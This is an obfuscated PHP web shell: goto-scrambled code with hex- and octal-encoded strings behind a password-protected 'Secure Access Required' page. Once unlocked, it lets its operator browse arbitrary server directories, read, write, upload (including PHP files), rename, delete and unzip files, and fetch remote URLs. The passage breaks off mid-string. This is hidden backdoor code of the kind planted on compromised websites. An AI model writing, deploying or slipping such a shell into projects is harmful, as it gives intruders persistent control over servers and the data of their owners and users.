"\42\40\x63\x6c\141\163\x73\x3d\42\x74\x65\170\x74\55\x76\151\166\151\x64\55\x74\145\x61\x6c\40\150\x6f\166\x65\x72\72\165\x6e\144\145\162\154\151\x6e\145\x22\x3e\56\x2e\40\x28\120\x61\162\x65\156\164\x20\x57\x6f\x72\x6b\x73\x70\141\143\x65\x29\x3c\x2f\141\76\x3c\57\x74\x64\x3e\15\12\x20\x20\40\40\x20\40\x20\x20\40\x20\40\x20\40\x20\40\x20\40\x20\x20\x20\40\40\40\40\x20\40\40\x20\x3c\x74\144\40\143\154\x61\163\x73\x3d\x22\160\55\64\x22\76\x2d\74\57\164\144\x3e\15\xa\x20\40\40\40\x20\40\40\40\x20\x20\40\x20\40\40\x20\40\40\x20\40\40\40\40\x20\40\40\40\x20\x20\74\164\144\x20\143\x6c\x61\x73\163\75\42\160\x2d\x34\x22\76\x2d\x3c\x2f\164\x64\76\xd\12\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\40\74\164\144\x20\143\154\x61\x73\163\x3d\x22\x70\55\x34\42\x3e\55\x3c\x2f\x74\144\76\15\12\x20\40\x20\40\x20\x20\x20\x20\40\x20\40\40\40\x20\40\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\40\x20\74\x74\144\x20\x63\x6c\x61\163\163\75\42\x70\55\64\42\x3e\x2d\74\x2f\164\144\76\xd\xa\x20\x20\40\x20\40\x20\40\40\40\x20\x20\x20\40\40\x20\40\40\x20\40\x20\x20\x20\x20\40\x20\x20\40\40\74\164\x64\x20\x63\154\x61\x73\163\x3d\x22\x70\x2d\64\x22\76\x3c\57\164\x64\76\15\12\x20\40\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\40\x20\40\x20\40\40\x20\x20\40\x3c\x2f\x74\162\x3e\xd\xa\x20\40\x20\40\x20\x20\40\40\40\x20\x20\40\x20\x20\40\x20\40\x20\x20\40"; goto NLLXg; IyZT2: cEO_N: goto mzE_a; QT3DB: $eiAOI = "\x49\156\x76\141\154\x69\144\x20\157\162\40\x69\x6e\141\x63\143\x65\163\163\x69\142\x6c\145\40\167\157\162\x6b\163\x70\x61\143\x65\56\x20\122\x65\166\145\x72\164\x65\x64\x20\164\x6f\x20\x64\145\146\x61\165\x6c\164\40\167\157\x72\153\x73\160\141\x63\x65\x2e"; goto LG5SR; EJP_Z: $q0y8u = realpath($_GET["\167\157\x72\153\163\x70\141\x63\x65"] . "\57" . $_GET["\x69\x74\145\x6d"]); goto GrFtf; UE2qZ: $TE33v = []; goto sbRc4; ZFtOu: $B81_5 = $_POST["\x69\164\145\x6d\137\x63\x6f\156\164\145\x6e\164"] ?? ''; goto agwmS; pnbXO: if (rename($gCExE, $c8hfI)) { goto PVkxQ; } goto Q2fhm; GxuM3: $DDlQG = nlkgx($EFHtu); goto iFrgs; cpCFu: if (isset($_POST["\163\x65\143\165\162\145\x5f\x6b\x65\171"]) && isset($_POST["\143\163\162\146\x5f\164\x6f\x6b\x65\x6e"]) && $_POST["\143\x73\162\146\137\164\x6f\153\145\156"] === $_SESSION["\x63\163\162\x66\137\x74\x6f\153\x65\156"]) { goto HQ9s7; } goto icbQy; FnEy2: goto vUOz2; goto MDfhd; icbQy: echo "\15\xa\x20\40\x20\40\40\x20\x20\x20\40\40\40\40\x3c\x21\x44\x4f\103\x54\131\x50\105\40\x68\164\x6d\x6c\76\15\xa\x20\x20\x20\x20\40\40\x20\40\40\x20\x20\x20\x3c\x68\x74\x6d\x6c\40\154\x61\156\147\75\x22\145\156\42\x3e\xd\xa\x20\40\40\x20\40\40\x20\x20\40\x20\x20\x20\x3c\150\145\x61\144\76\xd\12\40\40\x20\x20\40\40\40\x20\x20\x20\x20\x20\40\40\40\x20\x3c\x6d\x65\x74\x61\x20\143\x68\141\162\x73\x65\x74\75\x22\125\124\x46\55\x38\42\76\15\xa\x20\x20\x20\x20\x20\x20\40\x20\40\x20\40\40\40\x20\x20\x20\x3c\155\x65\x74\141\40\156\x61\155\x65\75\42\x76\x69\x65\167\x70\x6f\x72\164\x22\x20\x63\157\x6e\x74\145\156\164\75\42\167\151\x64\164\150\x3d\x64\145\166\151\x63\x65\x2d\167\x69\x64\164\150\54\40\151\x6e\151\164\151\x61\154\x2d\x73\143\141\154\145\75\x31\x2e\60\42\x3e\xd\12\x20\40\x20\40\x20\40\40\40\x20\40\x20\40\x20\40\40\x20\x3c\164\x69\x74\x6c\x65\76\101\x63\x63\x65\163\x73\40\104\145\156\x69\x65\144\x3c\57\x74\151\164\154\x65\76\15\xa\x20\40\x20\x20\x20\40\40\40\40\40\x20\x20\x20\40\40\x20\74\x73\143\x72\151\160\x74\x20\163\162\x63\x3d\42\x68\164\x74\x70\163\x3a\57\x2f\x63\x64\x6e\x2e\164\141\151\154\x77\151\x6e\x64\143\x73\163\56\143\157\x6d\42\x3e\x3c\57\163\143\x72\x69\x70\x74\76\15\12\x20\x20\x20\x20\40\x20\40\40\40\40\40\x20\x3c\57\150\145\x61\x64\76\15\12\40\40\40\40\40\40\x20\x20\x20\x20\40\x20\74\142\x6f\x64\x79\40\x63\154\141\x73\x73\75\x22\142\147\55\x76\x69\x76\151\144\55\163\x6c\x61\164\x65\40\155\151\x6e\55\x68\55\x73\x63\x72\x65\145\156\x20\146\x6c\x65\170\40\x69\164\x65\155\163\55\143\145\x6e\x74\x65\162\x20\x6a\x75\x73\x74\x69\146\x79\x2d\143\x65\156\x74\145\162\x22\x3e\xd\12\40\x20\40\x20\x20\40\x20\40\40\40\40\40\x20\x20\40\40\74\x64\151\x76\40\143\154\141\163\x73\75\x22\142\x67\55\167\150\151\164\145\x20\160\55\70\40\x72\x6f\x75\156\x64\x65\144\x2d\170\x6c\x20\163\x68\141\x64\x6f\x77\x2d\x78\154\x20\167\55\146\165\154\154\40\155\141\x78\x2d\167\x2d\155\x64\42\76\15\xa\40\40\40\40\40\x20\x20\40\40\40\x20\40\x20\40\x20\40\40\40\40\x20\74\150\62\40\143\x6c\141\163\x73\x3d\x22\164\x65\x78\x74\55\x32\x78\154\40\146\157\156\x74\x2d\x62\x6f\154\x64\40\x6d\x62\55\x36\40\164\x65\x78\x74\55\x63\145\156\x74\x65\x72\x20\x74\145\170\164\x2d\166\x69\x76\x69\144\x2d\x63\150\141\x72\143\x6f\141\154\x22\76\x53\x65\x63\x75\162\145\x20\x41\x63\x63\x65\x73\163\40\x52\x65\161\165\x69\162\145\x64\x3c\57\x68\x32\x3e\15\12\40\40\x20\x20\40\x20\40\x20\40\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\74\x66\157\162\x6d\x20\x6d\145\164\150\x6f\x64\x3d\42\x50\x4f\123\124\x22\76\xd\xa\x20\40\x20\40\40\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\74\x69\x6e\160\x75\164\40\164\x79\160\x65\x3d\x22\x68\x69\144\144\x65\156\42\40\x6e\x61\x6d\x65\75\42\x63\x73\x72\146\x5f\164\x6f\153\x65\156\42\40\x76\141\154\165\145\x3d\x22" . htmlspecialchars($_SESSION["\x63\x73\x72\x66\137\164\x6f\x6b\145\x6e"]) . "\42\76\xd\xa\40\40\40\40\x20\40\40\40\40\40\x20\40\x20\40\40\40\40\40\40\x20\40\40\x20\x20\x3c\x69\x6e\x70\x75\x74\40\164\171\160\145\x3d\x22\x70\x61\163\163\x77\157\162\144\42\40\x6e\141\x6d\x65\75\42\x73\145\x63\x75\x72\145\137\x6b\x65\171\42\x20\143\154\x61\163\163\75\42\x77\x2d\146\165\154\x6c\40\x70\x2d\63\40\142\x6f\162\x64\145\162\40\162\157\x75\x6e\x64\x65\x64\x2d\154\x67\40\155\142\x2d\x34\40\146\157\143\x75\163\x3a\157\165\x74\154\x69\x6e\x65\55\156\157\x6e\145\40\x66\x6f\143\x75\x73\72\162\151\156\x67\55\x32\x20\146\x6f\x63\165\163\x3a\x72\x69\x6e\147\x2d\166\x69\166\151\x64\x2d\x74\x65\141\154\42\40\160\x6c\x61\143\x65\150\157\x6c\x64\145\x72\x3d\x22\105\x6e\164\x65\162\x20\x73\145\143\x75\x72\145\40\153\x65\171\42\x20\x72\x65\161\165\151\162\145\144\40\x61\x75\x74\157\146\x6f\143\x75\x73\x3e\15\12\40\40\40\40\x20\x20\40\40\x20\40\x20\40\40\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\74\142\165\164\x74\157\x6e\40\164\171\160\x65\75\x22\163\165\142\x6d\151\164\x22\40\x63\154\x61\x73\163\x3d\x22\x77\55\146\165\154\154\40\142\x67\55\x76\151\166\151\x64\x2d\x74\x65\141\x6c\x20\164\x65\x78\164\55\167\x68\151\164\145\40\160\x2d\x33\x20\x72\x6f\165\156\144\x65\x64\55\x6c\147\40\x68\157\166\x65\162\72\142\x67\x2d\x76\x69\x76\151\144\55\164\145\141\154\x2d\x64\x61\162\153\x20\x74\162\141\156\163\151\x74\151\x6f\156\42\76\x55\156\154\x6f\143\153\74\57\x62\x75\x74\x74\x6f\x6e\76\xd\xa\40\40\40\40\40\40\40\40\40\x20\x20\40\40\40\x20\x20\40\40\40\x20\x3c\57\x66\157\x72\155\x3e\15\xa\x20\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x3c\57\x64\x69\x76\x3e\xd\12\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\74\x2f\142\157\144\x79\76\xd\xa\40\x20\40\40\x20\40\40\40\40\x20\x20\40\74\57\x68\x74\155\x6c\76\15\xa\x20\40\x20\40\40\40\40\x20\40\40\x20\x20"; goto Ax02k; g94EL: goto EIXzS; goto UkyAl; oMXsA: if ($PGl9z->open($mQzAK) === TRUE) { goto SNswM; } goto oukST; t2wzu: $c8hfI = $JuXLO . "\x2f" . $rdZLi; goto B8Ar7; z4QJ5: $xowh5 = scandir($JuXLO); goto UE2qZ; je1r_: CEB0D: goto Pn2Nm; OhhOL: kxkmX: goto TR2vJ; SKA0p: yCOT6: goto dIccV; LqLlA: UGz2B: goto X8cY8; LXLT8: echo YWKtb($JuXLO, $EOGAw); goto gUdIg; Gem1i: $eiAOI = "\x46\157\154\144\x65\x72\x20\x61\x6c\x72\145\x61\x64\x79\40\145\x78\151\x73\x74\163\56"; goto mv3fz; XeNBu: $eiAOI = "\x45\162\x72\157\x72\40\165\160\x64\x61\164\151\156\147\x20\x66\151\x6c\145\x2e"; goto tgrZr; Jwan3: goto wNzm6; goto VGUK7; lNYcX: goto rGfQF; goto NT8I4; ddTMK: goto FWoQf; goto Fo8E6; v0_Rt: echo htmlspecialchars($_SESSION["\143\163\x72\146\x5f\164\157\x6b\x65\x6e"]); goto uCaEY; oGzcE: wNzm6: goto OhhOL; R31Bk: ss0Pn: goto TZjh0; QZ0tN: $gCExE = $JuXLO . "\x2f" . $TzT08; goto t2wzu; pHyYb: QPtsw: goto pR6Uw; Xrc7_: exit; goto wd0O1; TdqNo: goto I45oj; goto FkN5Q; zBZq3: $NQNCx = z2HHU($_POST["\x61\x72\x63\150\151\166\145\x5f\156\x61\155\145"]); goto NFCL0; YJKKG: YRzkH: goto mYxMl; EW_pO: QLUbV: goto MHQ3Q; TgiRY: function XjqI2($FPgdS) { goto jD8sc; jD8sc: if (!($FPgdS >= 1073741824)) { goto S4n9y; } goto BJsQV; w7vy6: S4n9y: goto gCNwy; l6EI5: Ex4od: goto l8tAb; BJsQV: return number_format($FPgdS / 1073741824, 2) . "\x20\107\x42"; goto w7vy6; l8tAb: return $FPgdS . "\40\x62\x79\164\x65\x73"; goto rfG0D; QtIa3: return number_format($FPgdS / 1048576, 2) . "\x20\x4d\x42"; goto ha7Cw; R2dad: if (!($FPgdS >= 1024)) { goto Ex4od; } goto qVbqF; ha7Cw: tXh4s: goto R2dad; gCNwy: if (!($FPgdS >= 1048576)) { goto tXh4s; } goto QtIa3; qVbqF: return number_format($FPgdS / 1024, 2) . "\x20\113\x42"; goto l6EI5; rfG0D: } goto Xm9a5; p25ek: if ($PGl9z->extractTo($JuXLO)) { goto sxegx; } goto xU59t; dEEte: y4Wmh: goto pnbXO; ggbHY: if (!$amcpK) { goto ss0Pn; } goto YLeKk; FzHqF: echo htmlspecialchars($eiAOI); goto xRoXw; uJGlp: $eiAOI = "\x49\x74\145\155\40\x6e\x6f\x74\x20\146\x6f\x75\x6e\x64\56"; goto YNHsd; TR2vJ: tO2pF: goto z4QJ5; Ax02k: exit; goto nRVoX; XSC_f: goto lSfsZ; goto lWotz; g6mLv: exit; goto XSC_f; JucjL: MDXAH: goto GxuM3; cqXDI: $PW0Cu = ["\160\150\x70", "\x6a\x70\x67", "\x70\x6e\147", "\x7a\x69\x70", "\160\144\x66", "\x64\157\x63", "\144\157\x63\x78"]; goto yiFRb; sbRc4: $qZEqk = []; goto QVrFJ; ivdBD: $EOGAw = realpath(__DIR__); goto YC3iV; B0Oni: $_SESSION["\143\163\x72\146\137\x74\157\153\x65\156"] = bin2hex(random_bytes(32)); goto pvxMR; s2r62: $iMsFn = $JuXLO . "\57" . $sop0h; goto uN_MD; xRoXw: echo "\x20\x20\x20\40\x20\x20\40\x20\40\40\40\x20\74\57\144\x69\x76\x3e\xd\xa\40\x20\40\x20\x20\40\40\40"; goto SASfG; Wo35f: PR88D: goto IyZT2; rGH6K: YPUNT: goto Y3IqI; cV0IM: $cdttM = "\44\x32\141\44\x31\62\x24\156\154\x63\113\157\147\150\124\x52\170\150\160\x64\x71\x75\x67\151\110\63\x71\x6e\165\101\106\x61\x64\152\101\x6b\x6c\63\165\166\x31\x33\142\x78\116\x30\x5a\120\146\166\x68\63\x45\x74\64\167\x32\106\x77\66"; goto KShTY; dIccV: if (!(isset($_FILES["\165\x70\154\x6f\x61\x64\x65\144\137\x69\164\145\x6d"]) && $_FILES["\165\x70\154\x6f\x61\x64\145\x64\137\x69\164\x65\x6d"]["\145\162\162\157\162"] === UPLOAD_ERR_OK)) { goto t7RJ2; } goto t3TRH; GFEw2: if (password_verify($_POST["\163\145\143\165\x72\x65\137\x6b\145\171"], $cdttM)) { goto eeRC_; } goto p3baY; BYIo8: $eiAOI = "\x49\x74\145\x6d\x20\144\157\x77\x6e\154\x6f\x61\144\x65\x64\40\x73\165\143\143\x65\x73\163\146\x75\154\x6c\x79\56"; goto Wo35f; xU59t: $PGl9z->close(); goto f24AN; NFCL0: $mQzAK = $JuXLO . "\57" . $NQNCx; goto Of43j; kW40Z: $eiAOI = "\105\162\162\157\162\x20\165\x70\154\157\x61\144\151\156\x67\x20\151\164\x65\x6d\56"; goto GfWFZ; TZ05N: LaBkL: goto C85NG; n2ehn: F3MNV: goto AMRV8; OHpPn: echo file_get_contents($q0y8u); goto Xrc7_; nVYA8: EQeRN: goto je1r_; SASfG: h0yTr: goto yMwOi; YC3iV: $JuXLO = isset($_GET["\167\x6f\x72\153\x73\x70\x61\143\145"]) ? realpath($_GET["\167\x6f\162\153\x73\x70\141\143\145"]) : $EOGAw; goto VN6WE; XOH1r: W3kTc: goto Wzhlb; EdR10: goto KF6Ic; goto JucjL; GrFtf: if ($q0y8u && is_file($q0y8u) && is_readable($q0y8u)) { goto aFuw8; } goto h3hHK; LqQZ8: goto PR88D; goto N0Qo3; yMwOi: echo "\15\xa\40\x20\x20\x20\40\x20\40\x20\74\41\55\55\40\x41\143\164\151\x6f\x6e\x20\103\x61\x72\144\x73\x20\55\55\76\xd\xa\40\40\x20\x20\x20\40\x20\x20\x3c\x64\151\166\x20\x63\x6c\x61\163\163\x3d\42\147\162\x69\x64\40\x67\162\151\144\x2d\x63\x6f\x6c\163\55\61\x20\155\x64\x3a\147\162\151\144\55\x63\x6f\x6c\x73\55\x33\40\147\141\160\x2d\x36\40\x6d\142\x2d\70\42\76\xd\xa\40\40\x20\40\x20\x20\x20\40\x20\40\x20\x20\x3c\41\55\x2d\x20\101\x64\x64\x20\106\157\x6c\x64\x65\x72\x20\x2d\55\x3e\15\xa\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\40\74\144\151\x76\40\x63\x6c\x61\163\x73\x3d\42\x62\147\x2d\167\150\x69\164\145\40\x70\55\66\40\162\x6f\165\x6e\144\145\x64\55\x78\154\x20\163\150\x61\144\157\x77\x2d\x78\154\40\x76\151\x76\151\x64\x2d\x68\x6f\x76\145\x72\x22\76\15\xa\x20\x20\x20\40\x20\x20\40\40\x20\40\40\x20\40\40\x20\40\x3c\x68\63\40\143\154\141\163\x73\75\42\164\x65\170\164\55\170\x6c\40\x66\157\x6e\x74\55\163\145\x6d\151\x62\x6f\x6c\144\40\155\x62\55\64\40\164\145\170\164\x2d\166\x69\x76\x69\144\55\x63\x68\141\x72\x63\x6f\141\154\42\x3e\x4e\x65\x77\x20\106\x6f\154\144\145\162\x3c\57\150\x33\x3e\xd\xa\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\40\40\40\40\74\146\157\x72\155\x20\155\145\x74\150\157\x64\75\42\x70\x6f\163\164\x22\x20\x63\154\x61\163\x73\75\42\146\x6c\x65\x78\x20\x73\160\141\143\x65\55\x78\55\x33\x22\76\15\12\x20\40\40\40\x20\40\40\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\74\151\156\x70\x75\164\40\164\171\160\x65\x3d\x22\x68\x69\144\144\x65\x6e\x22\40\x6e\141\x6d\145\x3d\42\x63\163\162\146\x5f\164\x6f\x6b\x65\156\x22\40\x76\141\154\165\145\x3d\42"; goto JseVe; mmv7q: header("\x43\157\x6e\x74\145\x6e\x74\x2d\x54\171\160\x65\x3a\x20\x74\x65\170\x74\x2f\x70\154\141\151\x6e"); goto OHpPn; yB39h: $eiAOI = "\106\x69\x6c\x65\x20\141\x6c\x72\145\x61\x64\171\x20\x65\170\151\163\x74\163\x2e"; goto ddTMK; YS5PX: if (is_file($EFHtu)) { goto B9wqc; } goto EdR10; o68Gz: $eiAOI = "\111\164\x65\x6d\40\162\x65\156\x61\155\x65\x64\40\163\x75\x63\143\145\163\x73\x66\x75\x6c\x6c\171\56"; goto HMirx; GfWFZ: goto HnUgo; goto EW_pO; khOfQ: if (file_exists($EFHtu) && is_writable($EFHtu)) { goto iwbqT; } goto Wgxgp; Vq2jx: function Nlkgx($yzkXa) { goto PbYcU; ztuHI: return true; goto EtrXy; gOiax: foreach (scandir($yzkXa) as $u9hBm) { goto TCVsa; elBai: k6H3h: goto Ju0sa; B7gCa: K8eWV: goto k1zRp; WT_rX: return false; goto elBai; k1zRp: if (nLKgx($yzkXa . "\57" . $u9hBm)) { goto k6H3h; } goto WT_rX; Ju0sa: YJV6d: goto Wd7_W; TCVsa: if (!($u9hBm == "\x2e" || $u9hBm == "\56\x2e")) { goto K8eWV; } goto WI3sb; WI3sb: goto YJV6d; goto B7gCa; Wd7_W: } goto yvJ2K; T9Fj1: KvoD0: goto gOiax; TJeXj: return unlink($yzkXa); goto T9Fj1; PbYcU: if (file_exists($yzkXa)) { goto XmPNF; } goto ztuHI; tLIY1: if (is_dir($yzkXa)) { goto KvoD0; } goto TJeXj; EtrXy: XmPNF: goto tLIY1; yvJ2K: yEpuu: goto c9vrx; c9vrx: return rmdir($yzkXa); goto ykYPr; ykYPr: } goto QAJQZ; MJsJD: $eiAOI = "\101\x72\x63\x68\x69\166\145\40\156\157\x74\40\x66\157\x75\156\x64\x20\x6f\x72\40\x5a\151\160\101\162\x63\150\x69\x76\x65\x20\156\x6f\x74\x20\x61\x76\x61\151\x6c\141\142\154\145\56"; goto FnEy2; X0i2X: goto KF6Ic; goto rYnCk; J9lCy: if (!file_exists($lr3uS)) { goto wW3ET; } goto SN9cU; IWx7T: j7_2l: goto wz_DU; Of43j: if (file_exists($mQzAK) && class_exists("\132\x69\160\101\x72\x63\150\151\166\x65")) { goto qIqv1; } goto MJsJD; mUvQL: goto kRlUM; goto ZdZbN; TVh8n: sTi32: goto oGzcE; EVEQv: if (!(isset($_POST["\155\x6f\x64\x69\x66\x79\137\x66\x69\154\x65"]) && !empty($_POST["\x69\x74\145\x6d\137\x6e\x61\155\x65"]))) { goto kxkmX; } goto ZSnvJ; mzE_a: kRlUM: goto IvFCv; GyKT_: echo urlencode($JuXLO); goto nz64g; Ug6ZC: $eiAOI = "\x49\x6e\166\141\x6c\x69\x64\40\x72\x65\x6d\157\164\x65\40\x55\122\114\56"; goto mUvQL; bh8EK: OvUZo: goto fqbkG; TZjh0: echo "\x20\40\x20\40\x20\x20\x20\x20\74\57\144\151\x76\76\15\12\15\xa\40\x20\x20\x20\40\40\x20\x20\x3c\x21\55\x2d\x20\x49\164\145\x6d\40\124\x61\142\x6c\x65\40\x2d\x2d\x3e\xd\12\x20\40\x20\40\40\40\40\40\74\x64\x69\166\x20\143\x6c\x61\x73\x73\75\42\142\147\55\167\x68\x69\x74\x65\x20\162\157\165\156\144\145\144\x2d\170\x6c\x20\163\x68\141\144\x6f\167\x2d\x78\154\40\157\x76\145\162\146\154\157\x77\55\170\55\141\165\x74\157\x22\x3e\15\12\x20\40\40\x20\40\40\x20\40\x20\40\x20\40\x3c\x74\x61\x62\154\x65\40\x63\x6c\141\x73\x73\75\42\x77\x2d\146\165\154\154\x22\x3e\xd\xa\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x74\x68\x65\x61\x64\40\143\x6c\141\x73\x73\x3d\42\x62\x67\55\x67\x72\x61\x79\55\x31\60\60\x22\x3e\15\xa\40\40\x20\x20\x20\40\40\40\40\x20\40\x20\x20\40\x20\40\40\40\x20\x20\x3c\x74\x72\x20\x63\154\x61\163\x73\x3d\42\163\164\151\x63\x6b\x79\55\x68\x65\x61\x64\145\162\x22\x3e\15\xa\40\x20\40\40\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\40\40\40\40\x20\x20\x3c\164\150\40\x63\154\x61\163\x73\x3d\x22\160\x2d\x34\x20\164\x65\170\164\x2d\154\145\146\164\40\x74\145\x78\164\x2d\166\x69\x76\x69\144\x2d\x63\x68\141\162\x63\157\141\x6c\42\x3e\116\x61\155\x65\74\57\164\150\x3e\15\12\40\x20\40\40\40\x20\40\x20\40\40\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\40\40\x20\74\164\x68\40\143\154\141\163\163\x3d\42\x70\x2d\64\x20\164\x65\170\x74\55\154\145\x66\164\x20\x74\x65\170\x74\x2d\166\151\166\x69\x64\55\143\x68\x61\162\143\x6f\141\154\42\76\x54\171\x70\x65\74\x2f\x74\150\x3e\xd\12\x20\40\40\x20\40\x20\40\40\40\x20\40\40\40\40\x20\40\x20\x20\40\40\x20\40\40\40\x3c\164\150\40\x63\154\141\x73\163\x3d\x22\x70\x2d\64\40\164\145\170\164\55\x6c\145\146\x74\x20\x74\x65\x78\x74\55\x76\151\x76\151\144\55\x63\150\x61\162\x63\157\x61\154\42\76\x53\151\x7a\x65\x3c\57\x74\x68\76\xd\xa\x20\x20\x20\40\x20\40\x20\40\x20\40\x20\40\x20\40\x20\x20\40\40\40\40\x20\x20\x20\x20\x3c\x74\150\x20\143\154\x61\x73\163\75\x22\x70\x2d\x34\x20\x74\x65\x78\x74\x2d\154\145\x66\x74\40\x74\145\170\164\55\166\151\x76\151\144\55\143\x68\x61\x72\143\157\141\x6c\42\76\127\x72\x69\x74\x61\142\154\145\74\x2f\x74\150\x3e\xd\12\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\x3c\x74\150\x20\x63\x6c\x61\x73\163\x3d\x22\x70\x2d\x34\x20\164\x65\170\164\x2d\154\145\146\x74\40\x74\x65\x78\164\x2d\166\x69\x76\151\x64\x2d\143\x68\141\x72\x63\157\141\154\x22\76\x4c\141\163\164\40\x4d\x6f\x64\151\x66\151\145\x64\74\x2f\164\x68\x3e\xd\12\x20\40\40\x20\x20\40\40\40\x20\x20\40\40\40\x20\x20\40\x20\40\40\x20\x20\x20\40\40\74\x74\150\40\x63\154\x61\163\163\75\42\x70\x2d\64\40\164\x65\x78\x74\x2d\x6c\x65\146\x74\x20\x74\x65\x78\164\55\166\151\x76\x69\144\55\143\150\141\x72\143\157\141\154\42\76\x41\x63\164\x69\x6f\156\163\x3c\57\x74\x68\x3e\15\xa\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\40\40\x20\x20\x3c\57\x74\162\x3e\xd\xa\40\x20\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x2f\x74\x68\145\x61\144\x3e\15\12\40\x20\40\x20\x20\40\x20\x20\40\40\x20\40\40\x20\x20\x20\x3c\x74\x62\157\144\171\76\xd\12\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\40\40\40\40\74\x21\x2d\55\40\120\141\x72\x65\156\164\x20\127\x6f\162\x6b\x73\160\141\143\145\x20\x2d\x2d\x3e\15\xa\40\40\40\40\40\x20\x20\40\40\x20\40\40\x20\x20\x20\x20\x20\40\40\x20"; goto mjB6T; mYxMl: if (!(isset($_POST["\141\144\x64\x5f\146\151\154\x65"]) && !empty($_POST["\151\164\x65\155\137\156\x61\155\145"]))) { goto yCOT6; } goto eEaYP; eEaYP: $w529N = z2hhu($_POST["\151\x74\x65\x6d\137\x6e\141\155\145"]); goto ZFtOu; t3TRH: $cfUXs = $_FILES["\x75\160\x6c\157\141\144\145\144\137\151\x74\145\155"]; goto ntrLs; nzIGS: $oOyvY = $JuXLO . "\x2f" . $w529N; goto vzseR; LG5SR: ks3Rx: goto JaY03; zUxD1: if (!$VRFha) { goto SY6Uz; } goto QB1uP; zFl2w: vUOz2: goto n2ehn; Ya1H9: JNb9a: goto CRH1o; agwmS: $dmR7a = $JuXLO . "\x2f" . $w529N; goto Rybv9; oukST: $eiAOI = "\x46\x61\x69\x6c\145\x64\40\164\157\40\157\x70\x65\156\x20\141\162\x63\x68\151\x76\145\56"; goto g94EL; BHN0W: echo "\xd\xa\40\x20\x20\x20\40\40\x20\40\x20\40\x20\x20\x20\40\40\40\x20\40\40\40\74\x21\x2d\x2d\40\x46\x6f\154\x64\145\x72\x73\x20\55\x2d\x3e\xd\12\40\x20\x20\40\x20\40\40\x20\x20\x20\40\40\40\40\x20\40\40\40\x20\x20"; goto aceKt; MDfhd: qIqv1: goto uyPmA; qMNVu: if (file_put_contents($EFHtu, $B81_5) !== false) { goto W3kTc; } goto XeNBu; gUdIg: echo "\x3c\57\x6e\141\166\x3e\xd\xa\15\12\x20\40\x20\40\x20\40\x20\x20\x3c\41\x2d\x2d\40\x41\x6c\x65\x72\x74\40\x4d\145\163\x73\141\x67\x65\40\x2d\x2d\76\15\xa\x20\x20\x20\40\x20\40\x20\40"; goto Oauf3; IvFCv: ObQSB: goto EVEQv; nRVoX: goto H5DpE; goto GEfsm; nGbHx: $eiAOI = "\111\x6e\x76\141\154\x69\144\40\146\x69\x6c\x65\40\164\x79\x70\x65\x20\x6f\x72\40\146\x69\154\145\x20\141\x6c\162\x65\x61\x64\171\x20\x65\170\x69\x73\x74\163\x2e"; goto URoB1; VznkB: $sop0h = z2hHU($_POST["\146\157\x6c\x64\145\x72\x5f\x6e\x61\155\x65"]); goto s2r62; tgrZr: goto sTi32; goto XOH1r; qySaE: bCxUI: goto bh8EK; FZh6n: s8lvj: goto Ya1H9; jwZBq: h134b: goto FDu42; Y3IqI: $eiAOI = "\106\151\x6c\145\x20\x63\162\x65\x61\164\x65\144\40\x73\165\143\143\145\x73\x73\146\x75\x6c\154\171\x2e"; goto xbvpN; iFrgs: $eiAOI = $DDlQG ? "\x46\157\154\144\145\162\x20\144\145\x6c\x65\x74\145\144\40\163\165\x63\143\145\x73\163\146\165\154\x6c\x79\x2e" : "\x45\162\x72\157\x72\40\x64\145\154\x65\x74\x69\x6e\147\40\x66\157\x6c\144\x65\x72\56"; goto X0i2X; VGUK7: iwbqT: goto qMNVu; h3hHK: http_response_code(404); goto bUueP; bUueP: echo "\111\164\145\x6d\40\156\x6f\x74\x20\146\x6f\x75\x6e\144\x20\157\x72\40\156\157\x74\40\x72\x65\x61\x64\141\142\x6c\145\x2e"; goto g6mLv; qaBqR: $w529N = z2hHu(basename($ucr2r)); goto nzIGS; JMC0y: HnUgo: goto nVYA8; b5lZB: aJD3o: goto CB2Bw; ERU1n: sort($qZEqk); goto ccKab; pR6Uw: echo "\x20\40\40\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\x20\74\x2f\x74\142\157\x64\171\x3e\xd\12\40\40\40\40\x20\40\40\x20\40\x20\40\40\74\57\x74\141\142\x6c\x65\x3e\15\xa\40\x20\x20\x20\x20\40\40\40\x3c\57\144\151\166\76\xd\xa\40\x20\40\x20\74\x2f\144\x69\x76\76\xd\xa\xd\12\x20\x20\40\40\x3c\41\x2d\x2d\40\105\144\x69\164\x20\104\x69\141\154\x6f\147\x20\55\x2d\76\15\12\x20\40\40\x20\74\144\x69\x76\40\x69\144\75\42\145\x64\x69\164\104\x69\141\x6c\157\x67\x22\40\x63\x6c\x61\163\163\x3d\42\146\x69\170\145\144\x20\x69\x6e\163\x65\x74\55\x30\40\x62\147\55\147\x72\141\x79\55\x36\x30\x30\x20\142\147\x2d\157\x70\x61\x63\151\x74\171\55\x35\x30\x20\x68\x69\144\144\x65\x6e\x20\151\164\x65\155\163\55\x63\145\156\x74\x65\162\40\152\x75\163\164\x69\x66\x79\x2d\143\145\156\x74\145\x72\40\166\151\166\151\x64\55\164\162\141\x6e\163\x69\164\151\x6f\x6e\x22\x3e\15\12\40\x20\40\x20\x20\40\40\x20\74\144\151\x76\x20\143\154\141\x73\x73\75\42\142\147\x2d\x77\x68\151\164\x65\x20\160\x2d\x38\40\162\x